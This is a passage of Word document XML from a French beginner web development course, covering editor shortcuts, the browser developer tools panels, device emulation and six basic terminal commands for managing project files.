              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Ctrl+Maj+P : palette de commandes</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Ctrl+` : ouvrir le terminal intégré</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Alt+Maj+F : formater le document</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Ctrl+G : aller à la ligne</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>F12 : aller à la définition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 Les outils du navigateur</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le navigateur contient un atelier complet, souvent sous-estimé. Ouvrez-le avec F12, Ctrl+Maj+I ou par le menu. Cinq panneaux suffisent au quotidien.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.4 — Les cinq panneaux des outils de développement</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180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Panneau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="360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 principal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="360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Ce qu'on y cherche</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Éléments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Inspecter et modifier le DOM et les styles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Boîte d'un élément, règle CSS appliquée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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Console</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Exécuter du JavaScript, lire les erreurs</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Message d'erreur, valeur d'une variable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Réseau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Observer les requêtes HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Statut, taille, temps, en-têtes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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Sources</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Déboguer les scripts, poser des points d'arrêt</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Ordre d'exécution, portée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Inspecter le stockage et les cookies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>localStorage, cookies, cache</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le panneau </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Éléments</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est le plus utilisé. Un clic droit sur une zone de la page, puis « Inspecter », ouvre l'arbre du document à l'endroit exact. Le volet des styles montre toutes les règles qui s'appliquent, y compris celles héritées et celles écrasées. C'est là que se résolvent 80 % des questions de mise en forme.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2984500"/>
            <wp:docPr id="7" name="Picture 7"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f05.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2984500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.5 — Ce que révèlent les outils de développement</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LES MODIFICATIONS NE SONT PAS ENREGISTRÉES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Tout ce que vous modifiez dans les outils de développement disparaît au rechargement. Cet espace sert à </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>expérimenter</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>, pas à corriger. Une fois la bonne valeur trouvée, reportez-la dans votre fichier CSS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>2.2.1 Simuler un appareil</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le bouton d'appareil (Ctrl+Maj+M) active le mode responsive : largeur libre, appareils prédéfinis, émulation du tactile et du réseau lent. Attention : l'émulation ne remplace pas un téléphone réel. Les différences de police, de densité d'écran et de performance y sont sensibles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.3 Le terminal, allié du développeur web</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le terminal n'est pas réservé aux administrateurs système. Il sert à lancer un serveur local, installer des dépendances, initialiser Git, minifier des fichiers ou exécuter des tests. Six commandes couvrent l'essentiel des besoins de ce cours.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.5 — Six commandes pour survivre dans un terminal</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45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Commande</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="377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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Exemple</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cd dossier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3770"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Changer de dossier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cd mon-site</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>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ls -la</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="377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Lister le contenu, fichiers cachés inclus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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ls -la css</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>mkdir nom</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3770"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Créer un dossier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>mkdir images</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>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cp source cible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="377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Copier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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cp index.html sauvegarde.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>mv source cible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3770"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Déplacer ou renommer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>mv style.css css/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>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rm fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="377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Supprimer (définitif)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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rm brouillon.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Sous Windows, PowerShell accepte la plupart de ces commandes avec des variantes (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>copy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
